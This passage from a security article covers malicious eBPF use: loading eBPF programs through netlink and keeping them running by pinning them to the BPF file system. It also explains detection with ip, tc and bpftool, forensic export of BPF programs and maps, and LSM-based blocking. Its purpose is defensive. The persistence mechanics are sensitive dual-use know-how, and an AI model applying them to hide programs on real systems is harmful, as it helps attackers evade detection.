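/* Appends one attribute (4-byte header + 4-byte payload); returns the new offset. */
static size_t put_attr32(uint8_t *buf, size_t off, uint16_t type, uint32_t value)
{
    struct nlattr_model a = { (uint16_t)(sizeof(a) + sizeof(value)), type };
    memcpy(buf + off, &a, sizeof(a));
    memcpy(buf + off + sizeof(a), &value, sizeof(value));
    return off + sizeof(a) + sizeof(value);
}

/* Builds the nested IFLA_XDP attribute (FD + FLAGS) and returns its length. */
size_t build_xdp_attr(uint8_t *buf, size_t cap, int32_t fd, uint32_t flags)
{
    struct nlattr_model nest = { 0, ATTR_IFLA_XDP };
    size_t off = sizeof(nest);
    assert(buf != NULL && cap >= 20);
    off = put_attr32(buf, off, ATTR_IFLA_XDP_FD, (uint32_t)fd);
    off = put_attr32(buf, off, ATTR_IFLA_XDP_FLAGS, flags);
    nest.nla_len = (uint16_t)off;
    memcpy(buf, &nest, sizeof(nest));
    return off;
}

/* Total message length: netlink header + ifinfomsg + attributes. */
size_t xdp_request_len(size_t attr_len)
{
    return sizeof(struct nlmsghdr_model) + sizeof(struct ifinfomsg_model) + attr_len;
}
```

With an FD of 6 (attach) or -1 (detach) the nested attribute is 20 bytes and the whole request is 52 bytes, which is why both traces report the same length.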
This is not limited to the ip command. The tc command's classifier also supports BPF programs, loading them as classifiers and actions at the ingress/egress hook points. The principle is similar to that of ip: the NETLINK protocol is used to communicate with the kernel, and the NIC maintains the BPF object's reference counter.
Detection mechanism
Use the native ip, tc, and other commands to view the BPF objects loaded by the NIC:
ip link show
tc filter show dev [NIC name] [ingress|egress]
The bpftool command can also be used to view network-related eBPF hook points:
bpftool net show dev ens33 -p
Loaded programs of the cgroup types BPF_PROG_TYPE_CGROUP_SKB and BPF_PROG_TYPE_CGROUP_SOCK can be viewed with bpftool prog show. Compared with short-lifecycle BPF programs, long-lifecycle ones lack user-space process PID information. This is shown in the following figure:
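Beyond the figure, the PID check described above can also be scripted. The following is a minimal sketch that reads the JSON text printed by `bpftool -j prog show` and lists the programs with no owning process. The "pids" key is an assumption about that output: it is only emitted by bpftool builds that support process lookup, so on older builds every program would be listed. The function name is hypothetical.

```python
import json


def programs_without_owner(bpftool_json: str) -> list:
    """Return (id, type, name) for loaded programs that list no owning process.

    Assumes the JSON array printed by `bpftool -j prog show`, where each
    program may carry a "pids" list of {"pid": ..., "comm": ...} entries.
    """
    suspects = []
    for prog in json.loads(bpftool_json):
        if not prog.get("pids"):
            suspects.append((prog.get("id"), prog.get("type"), prog.get("name")))
    return suspects
```

A program without an owning process is not malicious in itself (pinned or NIC-attached programs from legitimate tools look the same), so the result is a list of candidates to review rather than a verdict.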
BPFFS
In addition to the methods mentioned above, the BPF file system (BPFFS) is also a way to keep BPF programs running in the background. A user-space process can pin a BPF program to BPFFS under any name it chooses; BPFFS automatically increments the BPF object's reference counter (refcnt), which keeps the program active in the background. To use it again later, call bpf_obj_get("BPFFS path") to get the FD of the BPF object.
On Linux, the file system type of BPFFS is BPF_FS_MAGIC. The default directory is /sys/fs/bpf/; it can be changed, but the file system type of the chosen directory must still be unix.BPF_FS_MAGIC.
For detection, we need to focus on whether a virtual file system is of type unix.BPF_FS_MAGIC.
On Linux systems, run
mount -t bpf
to see whether the file systems mounted on the system include the BPFFS type.
After locating the BPFFS directories, inspect the contents of each mount point for anomalies.
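The mount check above can be automated by reading the mount table directly. The sketch below parses text in the /proc/mounts format and returns every mount point whose file system type is bpf; the function name is hypothetical, and reading /proc/mounts instead of calling mount is a choice made for this example.

```python
def bpffs_mount_points(mounts_text: str) -> list:
    """Return the mount points whose file system type is "bpf".

    Expects text in the /proc/mounts format:
    device mountpoint fstype options dump pass
    """
    points = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[2] == "bpf":
            points.append(fields[1])
    return points
```

On a live system it could be called as bpffs_mount_points(open("/proc/mounts").read()); any mount point other than the default /sys/fs/bpf deserves a closer look.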
Forensics
Kernel-loaded BPF object exports
The bpftool tool can export a prog or map by its ID.
BPF prog program
A prog can be exported in opcodes, visual, linum, and other formats, and a call graph can be generated. For details, see the help output of bpftool.
root@vmubuntu:/home/cfc4n# bpftool prog help
bpftool prog dump xlated PROG [{ file FILE | opcodes | visual | linum }]
bpftool prog dump jited PROG [{ file FILE | opcodes | visual | linum }]
BPF map
As with prog, map contents can be exported with bpftool, and JSON output is supported.
root@vmubuntu:/home/cfc4n# bpftool map dump id 20
[{
"value": {
".rodata": [{
"target_ppid": 0
},{
"uid": 0
},{
"payload_len": 38
...
BPFFS
Pinning BPF objects to BPFFS makes it convenient to run them in the background: the user-space program can exit, and the objects can be retrieved again later. The same property is a great convenience for forensics. The bpftool command also supports exporting a prog or map from the path where it is pinned in the BPFFS file system. The parameters differ slightly; for details, see the bpftool help.
BPF objects not loaded by the kernel
Once the user-space program of the backdoor rootkit has been located, the BPF bytecode must be loaded by it. The bytecode is usually either placed in a separate file or compiled into the program itself. In the latter case, a disassembler such as IDA can be used to locate the relevant byte stream and export it.
As an example, the ehids process in the demo video in this article uses the pure Go eBPF module manager package GitHub/ehids/ebpfmanager. The eBPF bytecode is packed with the github.com/shuLhan/go-bindata/cmd/go-bindata package, which Gzip-compresses it and embeds it as a variable in the Go code, making deployment more convenient.
After loading the binary in IDA Pro, this data can be seen in the .noptrdata section, starting at address 0000000000827AE0. Exporting and then decompressing it restores the original BPF ELF file.
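The export-and-decompress step can also be approximated without a disassembler by scanning the binary for embedded Gzip streams. The sketch below is one such approach, not the method used in the article: it looks for the Gzip signature, tries to decompress from each hit, and keeps results that start with the ELF magic. The function name is hypothetical, and it assumes the embedded data is a plain Gzip stream as described above.

```python
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # gzip signature plus the deflate method byte
ELF_MAGIC = b"\x7fELF"


def carve_gzipped_elf(blob: bytes) -> list:
    """Return every ELF image found inside gzip streams embedded in blob."""
    found = []
    start = blob.find(GZIP_MAGIC)
    while start != -1:
        try:
            # 31 selects gzip framing; a decompress object tolerates the
            # unrelated bytes that follow the stream inside the binary.
            data = zlib.decompressobj(31).decompress(blob[start:])
        except zlib.error:
            data = b""  # false-positive signature, keep scanning
        if data.startswith(ELF_MAGIC):
            found.append(data)
        start = blob.find(GZIP_MAGIC, start + 1)
    return found
```

Each returned byte string can be written to a file and examined with the usual ELF tools.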
Because user-space BPF implementations and the libraries they use differ, static analysis can be difficult in practice. In that case, reproduce the same environment, run the program dynamically with the bpf syscall hooked in advance, and find the place where the FD is set up; the BPF ELF file can be exported this way as well.
Bytecode analysis
BPF bytecode is itself stored in ELF format; only the instruction format differs. The disassembler IDA Pro can support it as well: security engineers abroad have open-sourced a Python plug-in, eBPF IDA Proc, and written an article analyzing it, Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool, which interested readers can consult.
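To illustrate how the instruction format differs, the sketch below decodes raw eBPF bytecode into its fixed 8-byte instructions. The field layout (one opcode byte, one byte holding the destination register in the low 4 bits and the source register in the high 4 bits, a signed 16-bit offset, a signed 32-bit immediate) comes from the kernel's struct bpf_insn, not from this article. The names Insn and decode_insns are hypothetical, little-endian bytecode is assumed, and wide 64-bit immediate loads, which span two slots, are left as two separate entries.

```python
import struct
from typing import NamedTuple


class Insn(NamedTuple):
    opcode: int
    dst_reg: int
    src_reg: int
    off: int
    imm: int


def decode_insns(code: bytes) -> list:
    """Split raw little-endian eBPF bytecode into 8-byte instructions."""
    insns = []
    # Ignore any trailing bytes that do not form a full instruction.
    for pos in range(0, len(code) - len(code) % 8, 8):
        opcode, regs, off, imm = struct.unpack_from("<BBhi", code, pos)
        insns.append(Insn(opcode, regs & 0x0F, regs >> 4, off, imm))
    return insns
```

For example, the 16 bytes b7 00 00 00 02 00 00 00 95 00 00 00 00 00 00 00 decode to opcode 0xb7 (a 64-bit move of immediate 2 into r0) followed by opcode 0x95 (exit).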
How to defend
In network security scenarios, eBPF can be used for defense as well as for intrusion detection; the LSM PROBE hook provides the relevant functionality. Take container escape as an example: its most obvious behavioral feature is that the namespaces of the parent and child processes are inconsistent. When creation of the child process completes, the hook checks whether this feature matches and, if so, returns EPERM to override the return value of the process-creation function, thereby blocking the escape. Compared with kernel modules and other defense implementations, an eBPF implementation is more secure, stable, and reliable, and addresses container escape at the source.
Similarly, we believe that eBPF is the best solution for virtual patching and hot updates at the binary layer.
// Attached to the bpf LSM hook: deny the bpf() syscall by returning -EPERM.
LSM_PROBE(bpf, int cmd, union bpf_attr *attr, unsigned int size)
{
    return -EPERM;
}
This places certain requirements on the kernel configuration: CONFIG_BPF_LSM=y must be set, CONFIG_LSM must include bpf, and so on. For details, see the BCC library demo lsm probe.
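These two configuration requirements can be checked before deploying an LSM-based defense. The sketch below parses kernel configuration text and reports whether CONFIG_BPF_LSM=y is set and bpf appears in CONFIG_LSM. The function name is hypothetical, and where the configuration text comes from (for example a /boot/config-* file) is an assumption that varies by distribution. Note also that the active LSM list can be overridden at boot with the lsm= kernel parameter, which this check does not see.

```python
def bpf_lsm_ready(config_text: str) -> bool:
    """Check kernel config text for CONFIG_BPF_LSM=y and "bpf" in CONFIG_LSM."""
    options = {}
    for line in config_text.splitlines():
        line = line.strip()
        # Skip comments such as "# CONFIG_BPF_LSM is not set" and blank lines.
        if line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        options[key] = value.strip('"')
    lsm_list = options.get("CONFIG_LSM", "").split(",")
    return options.get("CONFIG_BPF_LSM") == "y" and "bpf" in lsm_list
```

The LSMs actually active on a running system are listed in /sys/kernel/security/lsm, which is a useful cross-check.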
Engineering Realization
Practice
To get started, try the BCC library (GitHub/BCC) and the various demo user-space programs written in C (Demo BPF applications).
Class library selection
For engineering work, where project quality, stability, and R&D efficiency matter, we recommend Cilium's pure Go eBPF library. It is officially backed by Cilium and can be used with confidence; Datadog's Agent product uses this library as well.
The product described in this article also follows Datadog's approach and wraps Cilium's eBPF library in an abstraction layer to make eBPF programs configurable and easy to manage. The GitHub repository is ehids/ebpfmanager, and you are welcome to use it.
Of course, a Go library that wraps libbpf can also be used, as products such as Tracee do.
System compatibility CO-RE
The emergence of eBPF has greatly lowered the barrier to writing kernel-space code, and eBPF is highly sought after for its security, friendly loading method, and efficient data exchange. However, as with traditional kernel modules, developing kernel-space functionality comes with tedious adaptation testing, and the many Linux kernel versions make adaptation even harder. This is why, before BTF emerged, the bcc + clang + llvm toolchain was criticized for a long time: programs are compiled at run time, so the target machine must have clang, llvm, kernel headers, and other parts of the build environment installed, and compilation consumes a lot of CPU, which is unacceptable on some heavily loaded machines.
This is where BTF and CO-RE came in. BTF can be understood as a format for describing debug symbols. Traditional debug information is very large, so Linux kernels generally ship with debug symbols turned off. BTF solves this problem by greatly reducing the size of the debug information, which makes it feasible for production kernels to carry it.
Fortunately, BTF and CO-RE can save developers a great deal of adaptation effort. The technology is still under development, however, and there are many scenarios it cannot yet handle, such as a structure member being moved into a substructure, which still has to be resolved manually. The developers of BTF have also written an article explaining how to handle the different scenarios: bpf-core-reference-guide.
Large-scale projects
Overseas, products in the cloud-native field are developing quickly, and a number of eBPF-based products have emerged, including Cilium, Datadog, Falco, and Katran, applied in fields such as network orchestration, network firewalls, tracing and troubleshooting, and runtime security. You can learn from the R&D experience of these large-scale projects to speed up product development, including multi-system compatibility, framework design, project quality, and monitoring system construction. This article focuses on detection and defense; we will share engineering experience in future articles.
Summary
With the rapid development of cloud native, software implemented with eBPF and the environments that run it will become increasingly widespread, and malicious use of eBPF will become increasingly common. Judging from the situation at home and abroad, overseas research in this direction is far ahead of domestic research. Once again, we urge that network security products be equipped with eBPF-related threat detection capabilities as soon as possible.
In this article, we discussed the malicious use of eBPF technology and the mechanisms for detecting it. Topics touched on here, such as eBPF in the development of defense and detection products and engineering practice, will be covered in the next article. Please look forward to it.
Author's Profile
Chen Chi, Yang Yi, and Xin Bo, all from Meituan Information Security.
References
- Creating and Countering the Next Generation of Linux Rootkits
- DEFCON 29 - eBPF, I thought we were friends
- eBPF's various technical applications PDF collection
- Offensive BPF: Malicious bpftrace
- Bad BPF - Warping reality using eBPF
- Lifetime of BPF objects
- BPF Program (BPF Prog) Type Explained: Usage Scenarios, Function Signatures, Execution Locations, and Program Examples
- Features of bpftool: the thread of tips and examples to work with eBPF objects
- Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool
- Creating and countering the next generation of Linux rootkits using eBPF
- eBPF Syscall
- Cilium eBPF implementation mechanism source code analysis
- ebpfkit is a rootkit powered by eBPF
Original article by SnowFlake, if reproduced, please credit https://cncso.com/en/linux-ebpf-attack-and-defense-and-security-html